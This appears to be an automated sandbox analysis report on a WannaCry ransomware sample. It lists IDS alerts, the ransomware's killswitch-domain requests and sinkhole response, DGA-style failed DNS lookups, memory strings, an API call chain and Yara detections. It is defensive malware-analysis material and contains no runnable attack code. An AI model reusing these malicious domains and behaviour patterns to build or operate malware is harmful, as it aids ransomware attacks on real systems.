                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jul 2022 17:40:36 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72dd7b9f5ba1691b-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:57859 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49722 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49722
                Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.7:63557 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.7:60996 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.7:49729 -> 104.16.173.80:80
                Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.7:49729
                Source: TrafficSnort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.7:58715 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.7:64618
                Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.7:49495
                Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.7:58838 -> 8.8.8.8:53
                Source: TrafficSnort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.7:52925 -> 8.8.8.8:53
                Tries to resolve many domain names, but no domain seems valid
                Source: unknownDNS traffic detected: query: bnkmik.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: vpqnxj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ocxepi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: wyksye.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iyvsrd.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oonymf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lyyppo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: rdtvdr.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ogggyz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yzeofb.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: nbjvkj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: teasgj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: xinoyg.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: vurdyj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cxfuoy.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: asesdh.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ibhjiz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ayxohj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: bxoqpu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pqjxkf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iodilu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ajiunz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: gefpqv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mipimr.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: hpqelp.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tdfkhn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: nbfpvs.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: sjotuu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: emjlon.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: uhcquu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: nuzyfp.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yuayzn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zaobbc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: xaatge.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: onmwqv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: kqurib.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: wabuqy.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pombmi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pxbypa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eekkiz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ueercj.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: rjajzc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: faepoi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eayzaw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eyakeo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: aantza.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: loozpo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cqofos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mdrnku.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ldyouw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ikgcbn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ouyghe.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: flcdqa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yurwei.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: uqghqa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eaqtlo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: tlmowf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: osbytn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: duomeu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: igeeyv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ttviky.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yivanc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iqhufw.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: exjeos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: atiajo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: izuupl.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ypfefo.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jzeiry.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iuwutz.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oktbec.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jrkbyt.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: hhvuzb.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: omxsxm.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zsljps.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pvyeyr.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lovzje.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ebalrg.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oeyeob.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: vuhaba.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: gfjioe.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zmquum.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yraxyh.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: kyivtg.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cododi.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ovgvxa.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: zynrye.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ybeujn.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mrbfyf.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: hyevqm.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yzwoea.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: peyuye.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: syeyep.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eaqmly.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mupjvv.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: lyeaew.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: txaoos.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ibmzei.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: jiqvfz.com replaycode: Name error (3)
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
                Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
                Source: svchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @http://www.facebook.com equals www.facebook.com (Facebook)
                Source: svchost.exe, 0000001C.00000000.540958832.000002BE77DB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                Source: lsass.exe, 00000008.00000000.402548409.0000025A31B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925380773.0000025A31B5B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.396242500.0000025A31B62000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: svchost.exe, 0000000D.00000000.410070465.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.927888936.0000020137EB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=en-US&sou
                Source: lsass.exe, 00000008.00000002.919611200.0000025A31A00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401417255.0000025A31A00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.918660611.000002974C200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: lsass.exe, 00000008.00000000.401546435.0000025A31A23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395096277.0000025A31A23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920850425.0000025A31A23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: lsass.exe, 00000008.00000000.401321528.0000025A312C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.394346103.0000025A312C0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.916563876.0000025A312C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.396441163.0000025A31BA1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.920042715.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                Source: lsass.exe, 00000008.00000000.396619135.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.393560717.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.911214683.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.923554018.0000025A31AC4000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.924163060.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401126485.0000025A3124D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402784904.0000025A31BC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000018.00000000.520202728.000002670D023000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.msoft
                Source: lsass.exe, 00000008.00000000.401805351.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395947661.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.402018763.0000025A31AF1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395702148.0000025A31AB6000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.401442713.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.925324135.0000025A31B56000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.395024814.0000025A31A0E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                Source: svchost.exe, 00000015.00000002.919070637.00000259A18C6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.493124863.00000259A18C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
                Source: mssecsvc.exe.2.drString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: mssecsvc.exe, 00000004.00000002.706316354.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
                Source: svchost.exe, 0000000D.00000000.410070465.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000000.409683873.0000020137E40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.927888936.0000020137EB6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.926140445.0000020137E40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-US
                Source: svchost.exe, 0000001C.00000002.937868047.000002BE7A000000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.558927925.000002BE7A000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://site-cdn.onenote.net/161182431559_Images/LiveTileImages/MediumAndLarge/Image1.png
                Source: mssecsvc.exe, 00000006.00000002.474520495.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kryptoslogic.com
                Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B027A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle,4_2_00B027A7
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
                Source: loaddll32.exe, 00000000.00000002.385381215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Detected Wannacry Ransomware
                Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!19_2_004014A6
                Yara detected Wannacry ransomware
                Source: Yara matchFile source: HFKDS6VcNO.dll, type: SAMPLE
                Source: Yara matchFile source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.388012447.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.385980083.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.396243293.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
